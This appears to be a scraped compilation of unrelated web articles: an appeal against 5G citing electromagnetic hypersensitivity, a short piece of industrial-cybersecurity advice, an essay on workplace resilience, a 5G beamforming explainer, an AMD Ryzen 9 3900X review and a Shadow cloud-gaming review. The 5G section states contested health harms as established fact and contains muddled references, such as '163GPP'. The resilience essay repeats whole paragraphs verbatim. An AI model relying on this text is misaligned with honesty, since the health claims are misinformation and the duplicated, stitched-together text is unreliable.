An increasing proportion of Europe’s population is affected by the disease symptoms that have been associated with exposure to electromagnetic fields by wireless techniques in the scientific literature for many years. The International Scientific Declaration on EHS & Multiple Chemical Sensitivity (MCS),Brussels 2015 states: “In light of our current scientific knowledge, we underline that all national and international bodies and organizations … recognize EHS and MCS as actual medical conditions. They have the role of guardian diseases. In the coming years, there could be far-reaching public health problems. This applies to all countries in which wireless technologies based on electromagnetic fields as well as marketed chemical substances are used without restrictions. … Inaction leads to costs for society and is no longer an option. We unanimously acknowledge this grave threat to public health.

Precautionary Measures


The precautionary principle (UNESCO) was adopted by the EU in 2005 : “If human activities can cause morally unacceptable damage that is scientifically plausible but uncertain, action must be taken to prevent or reduce that damage.”

The Resolution 1815 (Council of Europe, 2011): “Take all reasonable measures to reduce exposure to electromagnetic fields, in particular to high frequency waves from mobile phones, and in particular exposure of children and young people for whom the risk of brain tumors is greatest seems to be. … The Assembly strongly recommends that the ALARA (ALARA) principle be applied as low as reasonably achievable. Both the so-called thermal effects and the athermal (non-thermal) or biological effects of electromagnetic emissions or radiation must be taken into account “. In addition, (point 8.5) “the standards and the quality of the risk assessment must be improved”.

The Nuremberg Codex (1949) applies to all experiments on humans. It therefore includes the expansion of 5G with new, stronger exposure to RF-EMF. For all such experiments: “The trial shall be so planned and based on results of animal experiments and scientific knowledge about the disease or the research problem that the expected results will justify the conduct of the experiment. … No attempt may be made if it can be assumed from the outset that it will lead to death or permanent harm. “(Nürnberger Kodex, points 3-5). Previous published scientific studies show that “it can be assumed from the outset” that there are real health risks.

The European Environment Agency (EEA) warns against “radiation risks from everyday equipment”, although the radiation is below the WHO / ICNIRP limits . The EEA also concludes: “There are many examples where the precautionary principle has not been used in the past and where there have been serious and often irreversible damage to health and the environment. … harmful exposures can be widespread before there is both “convincing” evidence of damage from long-term exposure, as well as a biological understanding [mechanism] of how this damage is caused. “
“Safety guidelines” protect the industry – not the health The current ICNIRP “Security Guidelines” are outdated. All documented damages mentioned above occur even though the radiation is below the ICNIRP “Safety Guidelines”. That’s why new safety standards are required.

The reason for the misleading guidelines is due to the conflict of interest of the ICNIRP members due to their relationship with telecommunications or electricity companies. This undermines the impartiality that should guide the establishment of public exposure standards to non-ionizing radiation. … To assess cancer risks, it is necessary to include scientists with expertise in medicine, especially oncology. “The current ICNIRP / WHO guidelines for electromagnetic fields are based on the outdated hypothesis that” the critical effect of exposure to HF-EMF, which is relevant to human health and safety, in the heating of exposed tissue“However, scientists have proven that many different types of diseases and injuries have been caused without heating (” non-thermal effects “) at radiation intensities well below the ICNIRP limits.


We strongly suggest to the EU:


1) Take all reasonable measures to stop the propagation of 5G high frequency electromagnetic fields (RF-EMF) until independent scientists can ensure that for EU citizens 5G and the total radiation intensities produced by RF-EMF (5G with GSM, UMTS, LTE and WLAN) are not harmful, especially for infants, children and pregnant women as well as for the environment.
2) To recommend that all EU countries, and in particular their radiation protection authorities, comply with resolution 1815 and educate their citizens, including teachers and physicians, about health risks from RF EMF radiation and how and why wireless communication should be avoided, in particular in / on / near day care centers, schools, housing, workplaces, hospitals and aged care facilities.
3) Immediately, without industry interference, appoint an EU working group of independent, genuinely impartial scientists on EMF and health without conflict of interest, to assess health risks and:
a) To decide on new, safe “maximum total exposure limits” for all wireless communication within the EU.
b) To explore the total and cumulative exposure that affects EU citizens.
c) to draw up rules that are required / enforced within the EU to determine how to prevent the new “maximum total exposure limits” in the EU being exceeded. This applies to all types of electromagnetic fields to protect citizens, especially infants, children and pregnant women.
4) To prevent the wireless communications / telecommunications industry, via its lobby organizations, from persuading EU officials to make decisions in Europe on further distribution of high-frequency radiation, including 5G.
5) To prefer and expand wired digital telecommunications.

Millimeter wave health effects:

Release 163GPP (5G Phase 2) includes enhanced features like 5G above 52.6Ghz band.Frequencies in the range between 30 and 300 GHz is called mmwave or millimeter wave. If 5G Network uses The millimeter wave (mmWave) bands between 30 and 300 GHz offer massive amounts of raw bandwidth to enable multi-Gigabit-per-second (Gbps) wireless data rates.Thus, the main safety concern is heating of the eyes and skin caused by the absorption of mmWave energy in the human body.

How to Protect Production Facilities Effectively in 2020

How to Protect Production Facilities Effectively in 2020

4 Ways To Defend Your Factory From Today’s Security Threats

Cyber Security Challenges: How to Protect production facilities effectively in 2020

Cyber risks are increasingly posing a threat to industrial control systems and critical infrastructures. Securing these networks is a challenge for the industry as a whole. DFI CLub offers four steps solution.
 Cyber-crime attacks cause hundreds of billions of dollars worth of damage worldwide every year.
The fact that tax systems and critical infrastructures are exposed to ever-increasing cyber risks is due, on the one hand, to the changed threat landscape with state-sponsored attackers and increasing spill-over effects and, on the other hand, to the system-inherent factors, such as long lifecycles, often 20 to 30 years Complicate protection. The assurance of these networks is a challenge for the entire industry and will certainly deal the next decade. We have been aware of the vulnerabilities for a long time, but have done little but lip service to close them.
As is well known, every journey, no matter how long and arduous, begins with a first step. Companies that have been reluctant to take action to improve the security of their Operational Technology (OT) environment can take the following four steps to help them get started.
1. Identify the threat and communicate it forcefully in your business
Some time ago, the dangers were still abstract and it would probably have been difficult to convince senior management of the risks involved. Today, given the Russian infiltration of US power plants and the highly visible effects of the ransomware campaigns WannaCry and NotPetya, this should be much easier. NotPetya alone caused hundreds of millions of dollars worth of damage and caused world-renowned companies to disrupt their production.
2. Start a project to improve the security of your ICS network
One can assume that the threats to OT environments will continue to increase. It follows that the longer you wait, the risk increases further. As we approach the fourth quarter of 2019, the time has now come to plan and reserve the budget for projects that will deliver rapid results in 2020, increasing motivation for further engagement. So first, focus on practical, effective, and short-term solutions that increase your preparedness .
3. Talk to your partners, suppliers and analysts
Meanwhile, many ICS equipment suppliers are working together with cybersecurity companies. The manufacturers of the equipment you use can help you and give you valuable information on what to focus on. Talk to colleagues, including competitors, and benefit from their experience. The time has come for a cross-company exchange, especially in view of the threat which ultimately affects everyone and which can only be countered together.
4. First, tackle the biggest challenges
The crucial basis for all further actions is to first find out which assets are actually in use. That sounds banal, and most of those responsible will say that they know exactly what devices are in their networks. However, our experience of hundreds of ICS scans speaks a different language. Ultimately, you can only protect what you know. Accurate capturing of all assets, including insights into how they communicate with each other, is therefore of paramount importance. Only those who know the normal state are able to quickly identify abnormal, conspicuous behavior, to respond accordingly and to stop the accompanying threat.
These four measures should help all operators of production facilities and critical infrastructures to become more secure. Of course, they can and should be supplemented by their own requirements. Above all, it is important to put them into action. We should stop discussing whether the threat is real and finally address it before it’s too late.

Healthy Employees Manage Digital Transformation Better

Healthy Employees Manage Digital Transformation Better

Many companies have broken their once-rigid hierarchies. Working in agile project structures? The associated dynamics cope well with many employees. Others get stressed and become ill. To prevent this, companies should work on their corporate resilience. But what is it really? What resilience means, and why it matters ?

Resilience at work, why it is important and how to develop it ? How do you build corporate resilience?

Why one employee blossoms under the same dynamic conditions while another becomes ill has been researching resilience research for several years. The term resilience means jumping back and bouncing off. Into the psychology was introduced the term of the American scientist Emmy E. Werner, In her long study, she spent over 40 years watching the development of 698 children on the Hawaiian island of Kauai. One third of them came from difficult circumstances. She registered in the entire age cohort of the 1955 born, that of these 30 percent again showed a third particular resilience to their poor starting conditions. Despite their adversities, they developed into mentally healthy and stable, capable and happy adults. Based on these observations, resilience research has developed approaches to help people with stress conditions cope better. Resilience is not defined today as an innate personality trait, but as the result of an interaction process between a person and his environment. However, psychology also knows today that the development of resilience depends on protective factors that a human being can access and make use of. In children, for example, in addition to parents – or if they fail – caregivers such as teachers or friends who provide social stability and orientation. In addition to education, these must give a child a sense of attachment and security, as well as opening up social shelters in which to develop his personality and gifts. If these caregivers and protective factors are lacking, or if a young person does not use them, he can hardly escape his fate. In children, for example, in addition to parents – or if they fail – caregivers such as teachers or friends who provide social stability and orientation. In addition to education, these must give a child a sense of attachment and security, as well as opening up social shelters in which to develop his personality and gifts. If these caregivers and protective factors are lacking, or if a young person does not use them, he can hardly escape his fate. In children, for example, in addition to parents – or if they fail – caregivers such as teachers or friends who provide social stability and orientation. In addition to education, these must give a child a sense of attachment and security, as well as opening up social shelters in which to develop his personality and gifts. If these caregivers and protective factors are lacking, or if a young person does not use them, he can hardly escape his fate.

Number of Mental illnesses Increases

The teachings of Emmy E. Werner and the work of numerous scientists worldwide, who founded modern resilience research, can also be used well in an entrepreneurial context. The digital transformation, the overload of information, restructuring as a permanent state and cycles of innovation at ever shorter intervals as well as the generally deplored work crowding pose stress conditions for many workers. But in uncertain times disruptive changes cause stress as well as destructive communication; not to mention the “always on” mentality. But board members and management have a responsibility for the mental health of their workforce and should interpret the signals correctly. Because Germany suffers from mental illness, which increased significantly from 2007 to 2017. Since 1997, they have even tripled as DAK Psycho Report reported in July of 2019. Although there has been a slight downward trend since 2018, 2.2 million people were affected. The resulting economic costs have skyrocketed in parallel. They are now at 33.9 billion euros. In addition, the Federal Pension Fund approved more than 170,000 inpatient rehabilitation for mental illnesses in 2018. That was over 50,000 more than ten years earlier. Even assuming that these figures seem negligible given 40 million workers in Germany, employers, managers and managers would not do it justice. Because diseases and disproportionately increased costs are only the visible sign of a development.

Seven Factors of Resilient People

But stress is not always and for every person also the cause of a disease. All people have more or less pronounced resilience factors that enable them to cope with stress. From numerous empirical studies, for example, the US scientists identified Dr. Karen Reivich and Dr. Andrew Shatté of the University of Pennsylvania in 2003 seven factors that characterize a resilienten people. They have

1. Their emotions under control

2.Controlled emotions control their impulses, Both abilities are important above all in permanent change processes in order to be able to cope with the conflict situation that often accompanies them. Then a manager keeps his nerve, if he should delegate responsibility in agile project structures. Those who control their impulses can think clearly, control their actions, plan and act with foresight and achieve their goals. On this basis, a project manager can give just as clear instructions if he / she records.

3.Causal relationships , classifies them in terms of content, and communicates their expectations comprehensibly to his colleagues. Another skill describes

4. The self-efficacy So when a person is committed and self-confident, he tackles challenges he has never had to tackle. This competence is especially important in times of radical upheaval. Here dock the next skill that Reivich and Shatté denote with

5. Realistic optimism . For such personalities, the glass is half full and they are in difficult situations because they always see the positive possibilities and actively pursue them. Especially in companies that often break new ground with their digitization, such employees are a win.

6. Factor, the goal orientation, is vital in times of uncertainty to compensate for the often associated stress. Goal orientation distinguishes personalities who are curious to consistently aim for goals, even if their environment puts them in their way. This entrepreneurial ability is especially necessary in flat hierarchies and agile project structures when responsibility is delegated to teams and they also have to make decisions. Perhaps the most important skill for executives, however, is

7. Empathy, It is a gift to empathize with another person. Empathic leaders can understand the emotional situation of their employees and respond appropriately. A project manager who understands the disappointment of an overburdened employee who has to give up tasks can explain the reasons. He can give tips on how and with which measures a person can improve.

Resilience Competence is Build-able

Of course, hardly any leader can combine all factors equally well in his personality. But the most hopeful insight of current resilience research and practice is that resilience can be learned, but also how the condition can be built up in sports. Because resilience is not a static toolbox of personal characteristics or positive environmental factors, but is considered as a variable and multi-dimensional process that is ideally designed continuously as well as in sports. By providing protection factors such as coaching or training on a regular or on-demand basis, people can strengthen their personal resilience to stress. For companies, this means they should analyze the resilience constellations at management levels, departments and teams. This opens up completely new intervention and training approaches for the development of resilience competences of managers and employees. In a similar way to developmental psychology, to shift the focus from pathogenesis to salutogenesis. This health research approach not only asks what has made someone sick or about to get sick, but, above all, what can keep him healthy. This preventive approach of occupational health management (WHM) therefore seeks to strengthen an employee’s strengths rather than just deficits. The linchpin here is the management – from the board to the C-level. to strengthen the strengths of an employee and not just to work on deficits. The linchpin here is the management – from the board to the C-level. to strengthen the strengths of an employee and not just to work on deficits. The linchpin here is the management – from the board to the C-level.

Corporate Resilience is a Management Task

Because corporate resilience can not be separated from the personal resilience of individual managers. Rather, it is a task that should start with the executives. After all, they have an exemplary function and are sometimes the starting point for burdens. Therefore, they must first of all question their own leadership behavior and explore their own resilience skills – for example along the seven factors of Reivich and Shatté. They should be aware that interaction with employees and their communication behavior has an immediate impact on them. For example, if a project manager sends instructions at midnight or on vacation, he or she creates a real stressful situation in the office at the end of the day and in the office the next day. Such leadership is today undesirable for successful companies. They have to assume their role model role as managers and orient their behavior towards the basic mental health needs of their employees. At the same time, an occupational medical or occupational, organizational and organizational psychological (ABO-Psych) analysis helps identify structural, personal and organizational causes of mental stress in the workforce. Also proven are ABO office hours in which employees can open up to a psychologist subject to confidentiality. Such external psychologists have the advantage of being able to provide a mirror to executives with anonymous reports. This often succeeds To illustrate to a manager his less resilient leadership concept and to help him to work on his behavior. In addition to the ABO psychologists so-called resilience checks have proven themselves. These record daily workloads of individual employees using questionnaires as well as a 48-hour measurement of their vital data with a simple but electronically improved plaster. After evaluation, the participants receive individual advice with recommendations for action on how to deal better with and reduce their personal stress. These record daily workloads of individual employees using questionnaires as well as a 48-hour measurement of their vital data with a simple but electronically improved plaster. After evaluation, the participants receive individual advice with recommendations for action on how to deal better with and reduce their personal stress. These record daily workloads of individual employees using questionnaires as well as a 48-hour measurement of their vital data with a simple but electronically improved plaster. After evaluation, the participants receive individual advice with recommendations for action on how to deal better with and reduce their personal stress.

Combining Corporate and Error Culture with Resilience-building

But corporate resilience can not be arranged. It should be understood as a process. And it is not yet successful immediately, because the board and manager initiated by a resilience check works on itself. Also necessary is an inventory of the mindset of the corporate culture. Companies that want to strengthen their resilience to disruptive long-term change, work more agile in flat hierarchies to respond more quickly to market demands, must also revise their way of dealing with errors. In doing so, they can learn from start-ups that often make their breakthrough only through failed attempts and their will to succeed. Such an error culture ideally leads to a continuous learning process. This requires a mindset of openness, transparent communication and a willingness to recognize causes of error. fix them and share this learning curve in the company too. This not only increases the quality level in the long term, but also the satisfaction of the employees. They experience themselves as self-effective, can constructively solve problems and conflicts, and emerge strengthened from disruptive change processes.

Corporate Resilience As A Corporate Goal

Since corporate resilience is a permanent process, this task belongs to the corporate goals. It should be anchored as a strategic initiative with the necessary resources throughout the company. It is therefore important to develop corporate resilience into a permanent cross-cutting theme. On the one hand, she is regularly on the agenda of any department or team meeting. On the other hand, board members should not send their executives unprepared into a new excessive demand. Therefore, it is important to prepare them – for example through in-house seminars, but also personal counseling services. On this basis, executives decide what resources they need: From ABO psychologists to the resilience check as well as individual coaching or team supervision, the instrument case offers enough scope. And if the costs of resilience measures seem too high, HR managers can play the demographics card in addition to the arguments already mentioned: Because aging society and the shortage of skilled workers with too little talent, especially in the MINT professions, it is crucial older employees longer and to maintain a healthier working life. And staff turnover can also curb a company, as it has been proven to correlate with employee satisfaction. Because in the face of an aging society and a shortage of skilled workers with too few children, especially in the MINT professions, it is crucial to keep older employees longer and healthier in their professional lives. And staff turnover can also curb a company, as it has been proven to correlate with employee satisfaction. Because in the face of an aging society and a shortage of skilled workers with too few children, especially in the MINT professions, it is crucial to keep older employees longer and healthier in their professional lives. And staff turnover can also curb a company, as it has been proven to correlate with employee satisfaction.

Conclusion: Corporate Resilience pays off for Companies & Employees

Why is resilience important in business?

And employee satisfaction increases in parallel with the entrepreneurial resilience.Resilience to change in the workplace is must have trait now in the business. If employees experience their job as meaningful, they feel well in their department and with their colleagues and they find their boss to be balanced, confident, communicative and loyal, they are less ill. A satisfied employee therefore lacks on average only 9.4 days per year. Employees who feel constantly stressed and in which the overall working climate is not right are missing up to 19.6 days per year. In this respect, healthy employees better manage the burdens of digital transformation. The improvement of corporate resilience pays off twice: for economic reasons and for the employees.


Resilience and Agility are two top skills needed in Today’s Workplace.

Beamforming 5G – Mobile Radio With Pinpoint Accuracy

Beamforming 5G – Mobile Radio With Pinpoint Accuracy

Time has come for mobile operators to use beamforming and achieve even better performance in mobile communications.

In beamfroming, an active antenna emits 64 signals in parallel, all of which are individually controlled and aligned to customers.

Beaming – that’s what some of us know. Legendary sentence from the science fiction series: “Beam me up, Scotty!”

But while it is still not possible to beam people or objects like the USS Enterprise, the word “beam” actually leads the way in terms of beamforming. Because these targeted mobile radio beams are one of the most important technologies of the future 5G network. This technique is very fascinating.

What is Beamforming?

Nobody can answer this question better than Sebastian Gunreben, the 5G Integration Manager at Deutsche Telekom. He explains: “Beamforming is the next step to MIMO .”
As a reminder: In 4×4 MIMO, a kind of Quattro drive for the mobile network, provide four transmit antennas on the mast and four receiving antennas in the terminal for about 60 percent faster surfing. From the previous maximum LTE speed of 300 megabits per second (Mbps) are so to the 480 Mbit/s.
Beamforming takes up this principle, but increases it again by a factor of 16! Because here an active antenna emits 64 signals in parallel, which can all be individually controlled and aligned to customers. “These are 64 reception and transmission elements to form 64 different beams.
Instead of broadcasting a mobile radio signal in a circle, which then becomes weaker and weaker in the edge area, the signals can be aligned in beamforming, i.e in the “shaping of beams”, in the form of elongated lobes. With this beam, the signal is then similar in the edge area of the cell as in the center.

However, the antennas do not move. “The beam is formed by a phase shift of the signal and multipath propagation – the antenna itself remains static.” The beams are fully automatic, so that the transmission power can be adjusted as needed and ensures optimal coverage for each user.

What is Beamforming?

In the new technology, no telecom employee sits under the antenna to direct the beams at the individual customers. Because that happens fully automatically. The transmission power is adjusted as needed and provides optimal coverage for each individual user.
Anyone who calls on the phone and only has a small amount of resources is also covered by the appropriate beam as a customer who is currently streaming a video with a high data rate. Result: Mobile communications, tailor-made as needed. And the horizontal and vertical orientation of the new active antennas also increases the coverage – especially in urban areas with tall buildings. Incidentally, beamforming is also used in WLAN.

How fast is 5G beamforming?

So far, the new technology is not running outside in “wild”, but in the lab. “There, of course, we have perfect conditions and get several gigabits per second,” reveals 5G specialists.
In reality, the Beams are making sure we get close to these lab values, and there will always be a point where we can achieve similar data rates become.” Deutsche Telekom’s customers can therefore look forward to real gigabit mobile communications.

What happens if there are more than 64 users in a cell?

Beamforming 5g

One of the most important principles of beamforming: “The 64 lobes or beams are not aimed at a single user, but ultimately form locally a club. That is, it can quite within a beam several customers are served – and depending on what you request for network resources. “

A good example is a tourist group standing in front of Eiffel Tower and taking selfies. Their members are all captured and cared for by the same beam. But who uploads his photos via 5G on Instagram, needs and receives a higher performance and data rate than the tourist colleague next door, who only calls home.

This is the crucial difference between a passive mobile phone antenna and the new beamforming.

“The antenna performance remains more or less the same when compared to a conventional antenna, but the previous antenna always transmits with the same power, 24 With beamforming, I can virtually call up this performance only when there really is a need in this cell. “

Is gigabit speed the main advantage of beamforming?

Speed is one thing. But the higher network coverage through the new technology even more important. Because: “With a static antenna, we have a certain propagation field, so if we are at the edge of the network, it may be that we can not get high data rates anymore or that the service per user does not work.”

The active antenna, on the other hand, “sees” when a user is at the edge of the network – and specifically directs a beam at him. “That’s why we suddenly no longer at the edge of the net, but within a beam.” This gives customers higher data rates, and the services work.

Beamforming Advantages and Disadvantages:

So here are benefits of beamforming:

  1. The main principle of this technology is the biggest advantage and that is boosting the power of beams in the desired direction to serve the farthest subscribers in a best way by reaching them to telecom cell towers or base stations. This increases supporting capacity of a cellular tower in terms of number of subscribers.
  2. The RF signal can overcome noisy and attenuating channel environment due to the increase of C/N ratio of the signal in 5G beamforming. This increases coverage capacity of the cell tower or base station.
  3. Owning to its immunity against fading and interference it is widely used with MIMO in latest wireless technologies viz. Mobile WiMAX (IEEE 802.16e), LTE, LTE-Advanced, 5G etc.

There are also shortcomings or disadvantages of Beamforming

  1. In this set up multiple RF antennas are used so making hardware complexity higher.
  2. The beamforming system is based on advanced high processing DSP chips so more power consumption is required.
  3. Because of above mentioned reason, cost of beamforming system gets higher compare to non-beamforming system.
AMD Ryzen 9 3900X Stress Test Results – Incredible Performance Show

AMD Ryzen 9 3900X Stress Test Results – Incredible Performance Show

AMD Ryzen 9 3900X in the test showed incredible performance

Conclusion of Test:

AMD’s Ryzen 9 3900X turns out to be a wonder CPU in the test. The twelve-core processor beats direct competition in many flying flag tests, is efficient and, at the same time, only slightly more expensive. This is also Intel’s last stronghold, the consumer high-end, fell. Whether you are a gamer or a high-end user, there is little reason not to resort to the 3900X.


  • Strong single and multi-core performance
  • High efficiency
  • Compatible with old motherboards


  • No integrated graphics unit
  • A bit expensive

Test scores (compared to all tested products in this category)

Maximum power dissipation (TDP): 105 watts
Processor Clock: 3.80 GHz
Benchmark: x264: 150.26 fps
Number of CPU cores: 12
Base type: Socket AM4
Number of threads: 24
Level 2 cache: 12x 512 kByte
Level 3 cache: 65,536 kByte
Core Code Name: Matisse
Manufacturing process: 7 nm
Product: AMD Ryzen 9 3900X
Benchmark: PovRay, 1.280×1024, no AA: 6,174 pixels / s
Benchmark: TrueCrypt 7.2 AES Twofish Serpent: 979 MB / s
Maximum processor clock: 4.60 GHz
Integrated graphics unit: no onboard GPU
CPU performance: 1.4
Benchmark: HandBrake: 206.9 fps
Benchmark: Cinebench R15, max. Num. CPUs: 3,130 points
Graphic Benchmark: Bioshock Infinite: 0.00 fps
Benchmark: WinRAR: 27,823 MB / s
Benchmark: 3DMark Time Spy with GTX 1080: 8,143 points
GPU performance: 7.5
Benchmark: Excel 2016 – Monte Carlo Simulation: 0.45 seconds
Benchmark: PCMark 8: 4,153 points
Benchmark: 3DMark Firestrike with GTX 1080: 20,220 points
Graphics Benchmark: 3DMark Time Spy: 0 points
Graphic Benchmark: Metro Last Light: 0.00 fps
Graphics Benchmark: 3DMark Cloud Gate: 0 points
Graphics Benchmark: 3DMark Firestrike: 0 points

AMD Ryzen 9 3900X in Test: 


It’s moments like these when we look at test results with extremely mixed feelings. On the one hand, our eyes are glowing when we can experience a revolution live: The AMD Ryzen 9 3900X beats the direct competitor, the Intel i9-9900K, in our benchmarks by an average of 21 percent. And it is barely more expensive. On the other hand, the whole time the thought follows us: “That can not really be.”

Well, it can be and it is – we re-tested the i9-9900K with the latest updates, and in the end it has to be the short straw. We want to try to explain how AMD did that. But first a few words about the basic structure of the new Zen-2 microarchitecture and the benchmark results.

Turn two into Three

With Zen 2 aka “Matisse”, AMD says goodbye to the old Zeppelin-Die structure on the chip and splits the tasks into several parts: There are three components on the silicon of the R9 3900X. Two of these are so-called chiplets. Here live the cores of the Ryzen – maximum eight per chiplet, divided into four-cluster. The CPU-near cache is also located in the chiplets. Both chiplets communicate with the IO-Die via the “Infinity Fabric” data bus (“IO” stands for “in / out”). This in turn takes care of the data transfer to the rest of the PC, the memory management and also conveys information between the chiplets.


Test ItemAMD Ryzen 9 3900XIntel Core i9-9900K
PCMark 84,153 points4,152 points
PCMark 104,194 points3,783 points
Excel0.448 sec0.41sec
Cinebench R153,130 points2,033 points
Cinebench R207,111 points4,912 points
Cinebench R20 (ST)501 points511 points
Winrar27,823 KB / s25,476 KB / s
HandBrake206.9 FPS157.51 FPS
x264150.26 FPS120.31 FPS
X26514.107 FPS10.156 FPS
POV-Ray6,174.2 points4,272.93 points
TrueCrypt979 MB / s697 MB / s
Fire Strike20,220 points19,899 points
Time spy8143 points7681 points

Ryzen 9 is not Heavy on Power

A typical way to get more power out of the CPU is to increase power consumption. In our measurements with a 250-watt fan (TDP), however, there is hardly any difference between the top CPUs from AMD and Intel. In PCMark 10, the system power consumption comes to 234 and 350 watts depending on the test scenario. The Intel system, however, comes to marginally lower 233 and 348 watts. Even if one considers the different motherboards and their possibly different power consumption, the differences between the processors are negligible. So efficiency has not saved AMD.

The Secret is in the IPC

There is a big difference between AMD and Intel: clock speed. While Intel has cracked the 5 GHz, the Ryzen Boost only manages to reach 4.6 GHz. The stronger performance can only come from a monstrously improved IPC (instructions per cycle). AMD names here a few changes that in their entirety may contribute to the additional 15 percent IPC that the manufacturer specifies compared to the previous generation.

The most obvious is the enlarged L3 cache. 64 MB of CPU-near memory is now available. The improved AVX2 support is also exciting – the CPU now processes the data twice as fast. Furthermore, the chip improves branch prediction of instructions, gets a larger micro-op cache, and a more associative L1 cache.

A little more vivid are the last two improvements: on the one hand the so-called thread grouping. Processor threads, ie tasks of the executing programs, end up in Zen 2 in the same chiplet and there rather in the same computing cluster instead of at other ends of the processor. This should be a better solution especially for the spatially separated chiplets.

Subject Memory:

AMD has given the infinity fabric, so the CPU data bus, the clock more freedom. That should remove an old bottleneck – but there is, according to AMD, a “sweet spot” at DDR4-3733. If you want to save a bit of money without significant performance losses, should grab to DDR4-3600 (CL16). Unfortunately, we have not been able to test how different data rates affect performance.

Ultimately, you should not forget one thing in the CPU performance: AMD dispenses with an integrated graphics unit in the higher-end desktop processors. If Intel omitted these, more space would be available for CPU tasks. Where an integrated graphics unit can bring some significant advantages in benchmarks.

Blade Shadow Cloud Gaming Review

Blade Shadow Cloud Gaming Review

Shadow cloud gaming in nut shell is to rent instead of buying.


The cloud gaming service Shadow gives a promising picture in the test: Without having to have a gaming computer at home, you can play current PC video games in great quality - both on the undersized workstation and on the mobile device. Even competitive online games like Fortnite or Overwatch are easy to play. The operation and the setup are also very easy. The monthly costs seem high at first glance, but can pay off in comparison to your own gaming PC. We mainly criticize smaller, missing features, and express general concerns about the cloud approach - but they can also apply to any other service in the data cloud.


  • +Hardly a difference to a gaming PC.
  • +Good hardware.
  • +Extremely fast downloads and uploads.


  • -Occasionally framedrops and delays
  • -Games must be bought separately
  • -Price only pays off in comparison to an expensive gaming computer
  You can be jealous: Friends and acquaintances are playing the latest games like Call of Duty: Black Ops 4 or Assassin's Creed Odyssey with glorious detail, and you will be left behind because your computer does not have the necessary hardware. But why buy if you can rent? Blade's cloud gaming service "Shadow" replaces the beefy gaming computer or the annual hardware upgrade. We tested Shadow and can report promising results in advance. However, there are also some weaknesses that cloud the gameplay experience. Shadow Cloud Gaming review

What is Shadow?

Cloud gaming is now a term you find more often in the online world. In addition to Nvidia ( GeForce Now) Blade offers the service "Shadow". But what exactly does "cloud gaming" mean? Instead of having all the hardware you need to play at home, hire a computer with high-end hardware at Shadow's data center in Amsterdam. All you need is a device that packs some video decoding. For example, they connect via their home computer, which receives the input from the mouse, keyboard and controller, and the high-end computer at the other end of the line plays back the result via video stream. The only prerequisite is that you have a bandwidth of at least 15 Mbit / s. Thus, it does not matter what equipment your computer has.

To set up Shadow, you'll need to create an account from the Shadow page . It should be noted that there are two different subscription models: 39.95 € per month or 29.95 € / month for a 12-month subscription. After setting up your account, download the Shadow app. The Shadow app offers several options, but most settings should automatically adapt to your system. After connecting to your rented computer, you need to set up a hired Windows 10 on the remote machine. Then you are on your full-fledged cloud computer.

This is to be regarded as a new computer, which is spent as a kind of video stream on their native computer. Especially in full-screen mode, you forget that you remotely control another computer. You can use the calculator not only as a gaming machine, but also for many other purposes of a high-end computer - from simple office work to professional video editing.

On the Shadow computer tinkers an Intel Xeon processor with 12 GB of RAM, a Nvidia Quadro P5000 (equivalent to a GTX 1080), 256 GB of storage space (expandable by 1 TB), and a download bandwidth of up to 1 GB / s. The components thus guarantee that graphically more complex games run smoothly. In addition, according to Blade the hardware is constantly renewed.

Depending on the bandwidth, Shadow offers streaming with Full HD resolution at 144 Hz or 4K resolution at 60 Hz. The subscription also includes a loan of the Ghost streaming console, which you can easily connect to your TV via HDMI.

What shadow can do ?

The operation of Shadow is very simple and the app is very tidy. With a simple shortcut (Ctrl + Win + F) switch between window mode and full screen back and forth. The surface in full screen is indistinguishable from a normal computer - apart from the fact that you are not an unrestricted admin and get for example no access to the Task Manager. In window mode, you can also use the mouse cursor to browse through to your other applications on the home computer. Cumbersome keyboard shortcuts, which you need to free your mouse pointer from the shadow window, are not required.

In addition to the Windows app, there are also versions for MacOS and Ubuntu (beta). Another advantage is the seamless transition to mobile devices. Thus, you could continue to use Shadow on your smartphone. For mobile use, however, one should pay attention to its data volume - or best of all immediately hang in the WLAN.

The app runs smoothly on Android, but the device for iOS makes some circumstances. According to Shadow, you have to enter your Apple ID on the account page in order to receive an invitation to "Testflight" via e-mail (Note: Testflight is an online service for testing mobile applications), because at the time of the test there are still no Shadow App in AppStore gave. In the test, this did not work, it hooked on the invitation mail, since this never arrived.

Games are Impressive

For our gaming test we use an office computer used with mediocre hardware (Intel Core i7-5600U, 16 GB RAM) and no dedicated graphics card. The Internet connection is a 100-Mbit line. The client usually detected a bandwidth of just over 50 Mbit. After setup, we install various games on our shadow computer. Thanks to around 1 GB / s maximum download transfer rate, games are quickly installed on the computer - although we rarely saw more than 100 MB / s on various distribution platforms such as Steam or Battle.net.

The good news: Many singleplayer games are hardly a problem for the system. GTA V or Far Cry 5 run at full HD resolution at highest settings and around 90 frames per second. Also with Doom (2016) and Deus Ex: Mankind Divided we achieve an average of over 110 FPS in the played sequences with very high details in this resolution. Short framedrops occurred, but we did not perceive as particularly bad. We also tested the system with the 3DMark Time Spy Extreme benchmark suite. The resulting 2,566 points coincide with our expectations: the combination of Nvidia Quadro P5000 and Intel Xeon E5-2667 results in a great Full HD PC, but as a 4K device is rather poor. 3DMark sees the average gaming PC at 3,365 points.

When playing it rarely came to jerks or latency problems - with one exception: At closing time (17:30 clock), the system has on a test day under Doom (2016) geruckelt so much that it became unplayable. However, the system did not experience FPS break-ins. We suspected at the time that it was the connection and increased service utilization. Interestingly, we were unable to notice such stuttering when switching to other games. On other days and at other times, the problem did not reappear, so we can not explain the effect in the end. Irrespective of this, there is always the possibility that you might even have to accept quality restrictions in the event of high service utilization.

Online games Quality:

We were also interested in the online game performance. Because to the streaming-based input delays is still the delay through the communication with the game servers added. For this we have some online games installed that need fast reactions and where the smallest latency becomes a disadvantage.

League of Legends:

  • Very high graphics settings: average 100 FPS, 21 ms ping
  • Frequent input lag
  • Extreme FPS Drops

Call of Duty: Black Ops 4

  • Very high graphics settings: on average 100 FPS
  • Some input lags
  • Partial FPS Drops


  • Epic graphics settings: average 60 fps, 8 ms ping
  • High graphics settings: average: 100 FPS
  • Frequent sound lags
  • Partial FPS Drops
  • No input lag, very smooth gameplay


  • Epic graphics settings: an average of 98 FPS
  • No FPS drops
  • Hardly input lag, very smooth gameplay

In conclusion, online games that are about every millisecond are not fully recommended on a cloud machine. Above all, it is very annoying when it is stable for some time and in important team fights suddenly lags and jerks appear, which ruin an important maneuver. If you want to play games that are a little more relaxed online, you should not encounter any problems.

Want to pay the costs?

